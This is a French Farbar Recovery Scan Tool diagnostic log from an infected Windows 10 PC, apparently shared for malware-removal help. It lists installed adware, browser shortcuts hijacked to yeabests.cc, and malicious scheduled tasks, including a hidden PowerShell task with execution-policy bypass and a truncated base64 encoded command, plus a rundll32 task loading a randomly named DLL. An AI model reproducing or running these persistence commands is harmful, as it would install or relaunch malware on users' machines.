Publicité
Publicité
Format du document : text/plain
Prévisualisation
Résultats de l'Analyse supplémentaire de Farbar Recovery Scan Tool (x64) Version:25-04-2016
Exécuté par leon (2016-04-26 08:28:15)
Exécuté depuis C:\Users\leon\Downloads\Logiciel
Windows 10 Home Version 1511 (X64) (2016-02-28 16:04:57)
Mode d'amorçage: Normal
==========================================================
==================== Comptes: =============================
Administrateur (S-1-5-21-2442018056-4287239082-1881538495-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-2442018056-4287239082-1881538495-503 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-2442018056-4287239082-1881538495-1003 - Limited - Enabled)
Invité (S-1-5-21-2442018056-4287239082-1881538495-501 - Limited - Disabled)
leon (S-1-5-21-2442018056-4287239082-1881538495-1001 - Administrator - Enabled) => C:\Users\leon
==================== Centre de sécurité ========================
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé.)
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Protection antivirus et antispyware McAfee (Disabled - Up to date) {DA9F8ED0-D0DE-39CC-F55A-51AB4CC1B556}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Protection antivirus et antispyware McAfee (Disabled - Up to date) {61FE6F34-F6E4-3642-CFEA-6AD93746FFEB}
FW: Pare-feu McAfee (Disabled) {E2A40FF5-9AB1-3894-DE05-F89EB212F22D}
==================== Programmes installés ======================
(Seuls les logiciels publicitaires ('adware') avec la marque 'caché' ('Hidden') sont susceptibles d'être ajoutés au fichier fixlist.txt pour qu'ils ne soient plus masqués. Les programmes publicitaires devront être désinstallés manuellement.)
7-Zip 4.32 (HKLM-x32\...\7-Zip) (Version: - )
Adblock Plus pour IE (32-bits et 64-bits) (HKLM\...\{1C9A24E0-CA21-414D-8D21-22BF8981FC9F}) (Version: 1.5 - Eyeo GmbH)
Archiveur WinRAR (HKLM-x32\...\WinRAR archiver) (Version: - )
ASUS Live Update (HKLM-x32\...\{FA540E67-095C-4A1B-97BA-4D547DEC9AF4}) (Version: 3.2.9 - ASUS)
ASUS Screen Saver (HKLM-x32\...\{0FBEEDF8-30FA-4FA3-B31F-C9C7E7E8DFA2}) (Version: 1.0.3 - ASUS)
ASUS Smart Gesture (HKLM-x32\...\{4D3286A6-F6AB-498A-82A4-E4F040529F3D}) (Version: 4.0.5 - ASUS)
ASUS Splendid Video Enhancement Technology (HKLM-x32\...\{0969AF05-4FF6-4C00-9406-43599238DE0D}) (Version: 3.01.0003 - ASUS)
ASUS USB Charger Plus (HKLM-x32\...\{A859E3E5-C62F-4BFA-AF1D-2B95E03166AF}) (Version: 3.1.9 - ASUS)
ATK Package (HKLM-x32\...\{AB5C933E-5C7D-4D30-B314-9C83A49B94BE}) (Version: 1.0.0036 - ASUS)
AviSynth 2.5 (HKLM-x32\...\AviSynth) (Version: - )
Belgium e-ID middleware 4.1.13 (build 1717) (HKLM\...\{DB942AEA-93D6-4FE4-8862-180D35A71717}) (Version: 4.1.1717 - Belgian Government)
Call of Duty Advanced Warfare (HKLM-x32\...\Call of Duty Advanced Warfare_is1) (Version: - )
Call of Duty Black Ops II (HKLM-x32\...\Call of Duty Black Ops II_is1) (Version: - )
Canon Easy-WebPrint EX (HKLM-x32\...\Easy-WebPrint EX) (Version: 1.6.0.0 - Canon Inc.)
Canon IJ Scan Utility (HKLM-x32\...\Canon_IJ_Scan_Utility) (Version: - Canon Inc.)
Canon MG3200 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MG3200_series) (Version: 1.01 - Canon Inc.)
Canon MG3200 series On-screen Manual (HKLM-x32\...\Canon MG3200 series On-screen Manual) (Version: 7.5.0 - Canon Inc.)
Canon My Image Garden (HKLM-x32\...\Canon My Image Garden) (Version: 1.0.0 - Canon Inc.)
Canon My Image Garden Design Files (HKLM-x32\...\Canon My Image Garden Design Files) (Version: 1.0.0 - Canon Inc.)
Canon My Printer (HKLM-x32\...\CanonMyPrinter) (Version: 3.0.0 - Canon Inc.)
Canon Quick Menu (HKLM-x32\...\CanonQuickMenu) (Version: 2.0.0 - Canon Inc.)
CCleaner (HKLM\...\CCleaner) (Version: 5.10 - Piriform)
comoBoss version 1.1 (HKLM-x32\...\comoBoss_is1) (Version: 1.1 - aze) <==== ATTENTION
Device Setup (HKLM-x32\...\{1F07F2C7-596F-4F34-B805-2C61A3E50E5A}) (Version: 1.0.18 - ASUSTek Computer Inc.)
Enregistrement utilisateur de Canon MG3200 series (HKLM-x32\...\Enregistrement utilisateur de Canon MG3200 series) (Version: - Canon Inc.)
Foxit PhantomPDF (HKLM-x32\...\{045A0488-55C1-45B1-9992-4B4134904D61}) (Version: 7.0.59.127 - Foxit Software Inc.)
Free Video Call Recorder for Skype version 1.2.28.713 (HKLM-x32\...\Free Video Call Recorder for Skype_is1) (Version: 1.2.28.713 - DVDVideoSoft Ltd.)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 49.0.2623.112 - Google Inc.)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
hohosearch - Uninstall (HKLM-x32\...\Uninstall - isr) (Version: - )
IncrediMail (x32 Version: 6.3.9.5274 - IncrediMail) Hidden
IncrediMail 2.0 (HKLM-x32\...\IncrediMail) (Version: 6.3.9.5274 - IncrediMail Ltd.)
Intel(R) Dynamic Platform and Thermal Framework (HKLM-x32\...\FFD10ECE-F715-4a86-9BD8-F6F47DA5DA1C) (Version: 7.1.0.2105 - Intel Corporation)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.6.0.1038 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3496 - Intel Corporation)
Java 8 Update 77 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218077F0}) (Version: 8.0.770.3 - Oracle Corporation)
Light Image Resizer 4.7.1.1 (HKLM-x32\...\{EBE030DD-D404-4D92-85E9-8C3624820808}_is1) (Version: 4.7.1.1 - ObviousIdea)
maintenance software version 1.0 (HKLM-x32\...\maintenance software_is1) (Version: 1.0 - azec) <==== ATTENTION
McAfee LiveSafe (HKLM-x32\...\MSC) (Version: 14.0.6120 - McAfee, Inc.)
McAfee WebAdvisor (HKLM-x32\...\{35ED3F83-4BDC-4c44-8EC6-6A8301C7413A}) (Version: 4.0.189 - McAfee, Inc.)
Microsoft Office Professionnel Plus 2013 (HKLM\...\Office15.PROPLUS) (Version: 15.0.4569.1506 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Mozilla Firefox 43.0 (x86 fr) (HKLM-x32\...\Mozilla Firefox 43.0 (x86 fr)) (Version: 43.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 43.0 - Mozilla)
NVIDIA Graphics Driver 333.02 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 333.02 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.13.1220 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.13.1220 - NVIDIA Corporation)
OpenAL (HKLM-x32\...\OpenAL) (Version: - )
Outils de vérification linguistique 2013 de Microsoft Office - Français (Version: 15.0.4569.1506 - Microsoft Corporation) Hidden
Package de pilotes Windows - ASUS (ATP) Mouse (06/17/2015 6.0.0.66) (HKLM\...\1EFB54678773735560B565BE7FA6F2BCC557EE21) (Version: 06/17/2015 6.0.0.66 - ASUS)
Package de pilotes Windows - Fedict SmartCard (08/08/2015 4.1.5) (HKLM\...\9F46F7AB1E3B1B5F5482EA8D97F401B04FBF7958) (Version: 08/08/2015 4.1.5 - Fedict)
Panneau de configuration NVIDIA 353.54 (Version: 353.54 - NVIDIA Corporation) Hidden
PhotoFiltre 7 (HKU\S-1-5-21-2442018056-4287239082-1881538495-1001\...\PhotoFiltre 7) (Version: - )
PriceFountain (HKU\S-1-5-21-2442018056-4287239082-1881538495-1001\...\PriceFountain) (Version: - ) <==== ATTENTION
Qualcomm Atheros Client Installation Program (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 10.0 - Qualcomm Atheros)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.2.9200.39048 - Realtek Semiconductor Corp.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.33.529.2014 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7535 - Realtek Semiconductor Corp.)
Revo Uninstaller 1.95 (HKLM-x32\...\Revo Uninstaller) (Version: 1.95 - VS Revo Group)
Skype™ 7.22 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.22.109 - Skype Technologies S.A.)
SpyHunter 4 (HKLM-x32\...\SpyHunter) (Version: 4.21.18.4608 - Enigma Software Group, LLC)
Steam (HKLM-x32\...\{048298C9-A4D3-490B-9FF9-AB023A9238F3}) (Version: 1.0.0.0 - Valve Corporation)
TAP-Windows 9.9.2 (HKLM\...\TAP-Windows) (Version: 9.9.2 - )
TomTom HOME (HKLM-x32\...\{5DCB2EB3-87AD-426E-8D74-8B92C9D731C4}) (Version: 2.9.8 - Nom de votre société)
TomTom HOME (HKLM-x32\...\{BB05590A-6602-43F3-A400-77EA0976BC0A}) (Version: 2.9.8 - Nom de votre société)
TomTom HOME Visual Studio Merge Modules (HKLM-x32\...\{8F3C31C5-9C3A-4AA8-8EFA-71290A7AD533}) (Version: 1.0.2 - TomTom International B.V.)
UC浏览器 (HKLM-x32\...\UCBrowser) (Version: 5.6.11815.13 - 广州市动景计算机科技有限公司) <==== ATTENTION
Unity Web Player (HKU\S-1-5-21-2442018056-4287239082-1881538495-1001\...\UnityWebPlayer) (Version: 4.6.6f2 - Unity Technologies ApS)
Update for PriceFountain (HKU\S-1-5-21-2442018056-4287239082-1881538495-1001\...\{01364B9F-BC12-1420-6723-2F8DE4B5D2BD}) (Version: - Update for PriceFountain) <==== ATTENTION
Update Installer for WildTangent Games App (x32 Version: - WildTangent) Hidden
Utatity (HKLM-x32\...\{DF770D61-C0B3-46C9-8FAC-E8B6AE40D44E}) (Version: 1.0.0.0 - " ")
Viber (HKU\S-1-5-21-2442018056-4287239082-1881538495-1001\...\{b1142ab5-4e7c-4fa1-8734-115e5d1e1933}) (Version: 5.4.0.1661 - Viber Media Inc.)
Viber (x32 Version: 5.4.0.1661 - Viber Media Inc.) Hidden
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.0 - VideoLAN)
Vuze (HKLM\...\8461-7759-5462-8226) (Version: 5.6.1.2 - Azureus Software, Inc.)
WebStorage (HKLM-x32\...\WebStorage) (Version: 2.1.11.399 - ASUS Cloud Corporation)
WildTangent Games App (HKLM-x32\...\{70B446D1-E03B-4ab0-9B3C-0832142C9AA8}.WildTangent Games App-asus) (Version: 4.0.11.14 - WildTangent)
Windows Driver Package - ASUS (ATP) Mouse (03/18/2014 6.0.0.35) (HKLM\...\DAA6E0EEB715139C1CEA332C78AB4609FB3C211B) (Version: 03/18/2014 6.0.0.35 - ASUS)
WinFlash (HKLM-x32\...\{8F21291E-0444-4B1D-B9F9-4370A73E346D}) (Version: 2.42.0 - ASUS)
WinZip (HKLM-x32\...\WinZip) (Version: 10.0 (7245f) - WinZip Computing LP)
Wolfenstein: The New Order (HKLM-x32\...\V29sZmVuc3RlaW5UaGVOZXdPcmRlcg==_is1) (Version: 1 - )
Zip Key Demo (HKLM-x32\...\Zip Key 6.5 Demo) (Version: - )
==================== Personnalisé CLSID (Avec liste blanche): ==========================
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
CustomCLSID: HKU\S-1-5-21-2442018056-4287239082-1881538495-1001_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\leon\AppData\Local\Microsoft\OneDrive\17.3.6386.0412\FileCoAuth.exe (Microsoft Corporation)
==================== Tâches planifiées (Avec liste blanche) =============
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
Task: {01BF1B79-43F0-475F-98A1-92C374FA951E} - System32\Tasks\leonDojoWhenasV2 => Rundll32.exe NeocolonialistsGenocidal.dll,main 7 1 <==== ATTENTION
Task: {097BFB8B-8E06-4931-A01A-DFED6D374FB2} - System32\Tasks\ASUS Live Update1 => C:\Program Files (x86) [2016-04-25] ()
Task: {09BE6CE3-7901-469C-9AD0-DEC0887EF27C} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Pas de fichier <==== ATTENTION
Task: {159786BF-7CDD-4377-B7AF-355E2D6A6ACC} - System32\Tasks\Update Checker => C:\Program Files (x86)\ASUS\ASUS Live Update\UpdateChecker.exe [2014-04-11] ()
Task: {1815A6ED-8119-48F6-81AC-AFBEF71560D3} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-28] (Google Inc.)
Task: {1FBAE9FB-DA75-436B-B8B5-3B0B68C1193F} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Pas de fichier <==== ATTENTION
Task: {22601BC6-C222-4075-8B1D-32D36116B1B3} - System32\Tasks\ASUS Live Update2 => C:\Program Files (x86) [2016-04-25] ()
Task: {299DB631-3301-4838-934B-0151375ACD72} - System32\Tasks\{01364B9F-BC12-1420-6723-2F8DE4B5D2BD} => C:\Users\leon\AppData\Roaming\PriceFountainUpdateVer\productupdate.exe [2013-04-12] () <==== ATTENTION
Task: {343381DA-2856-4555-A558-D2783D3DCB64} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Pas de fichier <==== ATTENTION
Task: {3442FB15-641D-458F-AE93-710F176F658E} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Pas de fichier <==== ATTENTION
Task: {36E27157-D0DB-4D2D-A708-3BCE4417161E} - System32\Tasks\ASUS\ASUS Product Register Service => C:\Program Files (x86)\ASUS\APRP\aprp.exe [2014-09-02] (ASUSTek Computer Inc.)
Task: {55A999D3-61FF-43BE-A985-C64408631865} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Pas de fichier <==== ATTENTION
Task: {58D52DA3-0A43-494A-9870-B66A32C1CD23} - System32\Tasks\ASUS Splendid ACMON => C:\Program Files (x86)\ASUS\Splendid\ACMON.exe [2014-04-02] (ASUS)
Task: {682B52FE-2470-41B9-AC07-FACBAC1A7910} - System32\Tasks\{3065E0C3-D223-4C1B-9F06-264AB391D02A} => pcalua.exe -a "C:\Program Files (x86)\Common Files\Medstock\uninstall.exe" -c shuz -f "C:\Program Files (x86)\Common Files\Medstock\uninstall.dat" -a uninstallme DF770D61-C0B3-46C9-8FAC-E8B6AE40D44E DeviceId=1a76d8d9-6e57-4cd1-9068-53908d708bb9 BarcodeId=51113011 ChannelId=11 DistributerName=APSFTuto4PC
Task: {6BB1F596-2694-4EF9-921C-6CAABBBE2618} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-04-13] (Microsoft Corporation)
Task: {70314142-96A6-407C-9154-B9C44DED08FD} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-28] (Google Inc.)
Task: {873470B4-480B-4B00-A81C-81418B20DC2B} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe [2014-01-23] (Microsoft Corporation)
Task: {8FCF00EA-C42A-44C3-87C3-B34094DE8D50} - System32\Tasks\McAfee\McAfee Idle Detection Task
Task: {953F966C-D046-49C3-B45E-D6F9099AADC3} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Pas de fichier <==== ATTENTION
Task: {981407EC-AB47-47D5-BF76-30A4B3BDA888} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Pas de fichier <==== ATTENTION
Task: {9988C6CA-BC08-43F7-A2F1-FFEDAB3668B7} - System32\Tasks\{BE1F1286-5D21-417E-900A-6EB5E171961F} => pcalua.exe -a C:\Users\leon\Downloads\spywebcamlight.exe -d C:\Users\leon\Downloads
Task: {9D36344E-2838-4DAD-BB36-D32A4D2D45A6} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2015-09-16] (Piriform Ltd)
Task: {9EA4FBBF-EA62-4875-B8D9-BD12821E5C7D} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Pas de fichier <==== ATTENTION
Task: {AA370152-9299-4A0F-8111-B49C9F3503F4} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office\Office15\msoia.exe [2014-01-23] (Microsoft Corporation)
Task: {B5128945-5F2E-4246-8F68-99B44E7EE418} - System32\Tasks\RtHDVBg => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2015-06-24] (Realtek Semiconductor)
Task: {B7F40406-03A6-41DD-AC61-807F2694EF9A} - System32\Tasks\ASUS USB Charger Plus => C:\Program Files (x86)\ASUS\USBChargerPlus\USBChargerPlus.exe [2014-03-27] (ASUSTek Computer Inc.)
Task: {BC2047C3-D26A-44FA-928D-F7515ADB9C86} - System32\Tasks\{79047E47-7D0A-797A-0C11-7D0F7D091178} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand IAAgACAAOwA7ADsAOwAgACAAIAAgADsAOwA7ACAAOwA7ADsAIAAgACAAOwAgADsAIAAgADsAIAA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAHMAdABvAHAAIgA7ACQAcwBjAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIA (l'élément de données a 9836 caractères en plus). <==== ATTENTION
Task: {C01D02BE-ABD8-4E20-BD35-5D8CEEA287C2} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Pas de fichier <==== ATTENTION
Task: {C932E0D9-0FAD-4684-8196-81AE0B98F9D4} - System32\Tasks\Microsoft Office 15 Sync Maintenance for VICTOR-leon victor => C:\Program Files\Microsoft Office\Office15\MsoSync.exe [2014-01-23] (Microsoft Corporation)
Task: {D0CDC4E9-270B-49C7-A27C-62A020ADBEF8} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office\Office15\msoia.exe [2014-01-23] (Microsoft Corporation)
Task: {D4A0BC83-321D-4CBB-8006-974C999E28CC} - System32\Tasks\{8163FB91-6CAC-48D0-8472-236359389C9E} => pcalua.exe -a "C:\Users\leon\Downloads\WMEncoder webcam .exe" -d C:\Users\leon\Downloads
Task: {DBEE3D26-7F02-4B0D-ADF8-927A838774C2} - System32\Tasks\ASUS Smart Gesture Launcher => C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPLauncher.exe
Task: {DF53D093-4A8F-452C-AE7D-E494914878C5} - System32\Tasks\ATK Package 36D18D69AFC3 => C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\SimAppExec.exe [2014-01-14] (ASUSTek Computer Inc.)
Task: {E1731A1E-EDBE-4B79-A8F6-D8B76233EB67} - System32\Tasks\RTKCPL => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [2015-06-24] (Realtek Semiconductor)
Task: {E81EFEFB-DE30-4BC7-9A46-BF8FB07BAB27} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Pas de fichier <==== ATTENTION
Task: {EB239310-EAFB-4625-827D-C7A64B71C2E2} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Pas de fichier <==== ATTENTION
Task: {EC029CFB-CE8A-4A7B-8419-32206DF823C7} - System32\Tasks\McAfee\McAfee Auto Maintenance Task Agent
(Si un élément est inclus dans le fichier fixlist.txt, le fichier tâche (.job) sera déplacé. Le fichier exécuté par la tâche ne sera pas déplacé.)
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\{01364B9F-BC12-1420-6723-2F8DE4B5D2BD}.job =>
==================== Raccourcis =============================
(Les éléments sont susceptibles d'être inscrits dans le fichier fixlist.txt afin d'être supprimés ou restaurés.)
ShortcutWithArgument: C:\Users\leon\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://yeabests.cc
ShortcutWithArgument: C:\Users\leon\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://yeabests.cc
ShortcutWithArgument: C:\Users\leon\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://yeabests.cc
ShortcutWithArgument: C:\Users\leon\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome (2).lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://yeabests.cc
ShortcutWithArgument: C:\Users\leon\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://yeabests.cc
ShortcutWithArgument: C:\Users\leon\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://yeabests.cc
ShortcutWithArgument: C:\Users\leon\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://yeabests.cc
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://yeabests.cc
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://yeabests.cc
ShortcutWithArgument: C:\Users\Public\Desktop\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://yeabests.cc
==================== Modules chargés (Avec liste blanche) ==============
2015-10-30 09:18 - 2015-10-30 09:18 - 00185856 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2016-02-28 17:35 - 2015-07-13 19:37 - 00116552 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2016-04-13 14:06 - 2016-03-29 12:20 - 02656952 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2016-02-27 19:59 - 2016-02-27 19:59 - 00402344 _____ () C:\WINDOWS\system32\igfxTray.exe
2016-04-13 14:06 - 2016-03-29 12:20 - 02656952 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2016-04-21 08:40 - 2016-04-21 08:40 - 00959176 _____ () C:\Users\leon\AppData\Local\Microsoft\OneDrive\17.3.6386.0412\amd64\ClientTelemetry.dll
2016-02-28 17:24 - 2016-02-28 17:24 - 00093696 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\Windows.UI.Shell.SharedUtilities.dll
2016-04-13 14:02 - 2016-04-02 05:25 - 00472064 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2016-04-13 14:04 - 2016-04-02 05:03 - 07992832 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-04-13 14:04 - 2016-04-02 04:58 - 00591360 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-04-13 14:05 - 2016-04-02 04:59 - 02483200 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2016-04-13 14:05 - 2016-04-02 05:02 - 04089856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2015-09-16 21:33 - 2015-09-16 21:33 - 00065536 _____ () C:\Program Files\CCleaner\lang\lang-1036.dll
2014-04-02 16:46 - 2014-04-02 16:46 - 00117248 _____ () C:\Program Files (x86)\ASUS\Splendid\CCTAdjust.dll
2014-04-02 16:46 - 2014-04-02 16:46 - 00037936 _____ () C:\Program Files (x86)\ASUS\Splendid\DetectDisplayDC.dll
2014-04-02 16:46 - 2014-04-02 16:46 - 00018992 _____ () C:\Program Files (x86)\ASUS\Splendid\AMDColorEnhance.dll
2014-04-02 16:46 - 2014-04-02 16:46 - 00020528 _____ () C:\Program Files (x86)\ASUS\Splendid\AMDRegammaAndGamut.dll
2016-04-21 08:40 - 2016-04-21 08:40 - 00679624 _____ () C:\Users\leon\AppData\Local\Microsoft\OneDrive\17.3.6386.0412\ClientTelemetry.dll
2016-04-25 23:31 - 2016-04-25 23:31 - 00370688 _____ () C:\Users\leon\AppData\Local\DojoWhenas\NeocolonialistsGenocidal.dll
2016-04-11 21:52 - 2016-04-06 12:04 - 01675928 _____ () C:\Program Files (x86)\Google\Chrome\Application\49.0.2623.112\libglesv2.dll
2016-04-11 21:52 - 2016-04-06 12:04 - 00086168 _____ () C:\Program Files (x86)\Google\Chrome\Application\49.0.2623.112\libegl.dll
==================== Alternate Data Streams (Avec liste blanche) =========
(Si un élément est inclus dans le fichier fixlist.txt, seul le flux de données additionnel (ADS - Alternate Data Stream) sera supprimé.)
==================== Mode sans échec (Avec liste blanche) ===================
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le "AlternateShell" sera restauré.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""="Service"
==================== EXE Association (Avec liste blanche) ===============
(Si un élément est inclus dans le fichier fixlist.txt, l'élément de Registre sera restauré à la valeur par défaut ou supprimé.)
==================== Internet Explorer sites de confiance/sensibles ===============
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre.)
IE trusted site: HKU\.DEFAULT\...\amazon.com -> hxxps://amazon.com
IE trusted site: HKU\S-1-5-21-2442018056-4287239082-1881538495-1001\...\amazon.com -> hxxps://amazon.com
==================== Hosts contenu: ===============================
(Si nécessaire, la commande Hosts: peut être incluse dans le fichier fixlist.txt afin de réinitialiser le fichier hosts.)
2013-08-22 15:25 - 2013-08-22 15:25 - 00000824 ____A C:\WINDOWS\system32\Drivers\etc\hosts
==================== Autres zones ============================
(Actuellement, il n'y a pas de correction automatique pour cette section.)
HKU\S-1-5-21-2442018056-4287239082-1881538495-1001\Control Panel\Desktop\\Wallpaper -> c:\windows\web\wallpaper\theme1\img1.jpg
DNS Servers: 62.197.111.140 - 109.88.203.3
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Le Pare-feu est activé.
==================== MSCONFIG/TASK MANAGER éléments désactivés ==
(Actuellement, il n'y a pas de correction automatique pour cette section.)
HKLM\...\StartupApproved\StartupFolder: => "WinZip Quick Pick.lnk"
HKLM\...\StartupApproved\Run32: => "CanonQuickMenu"
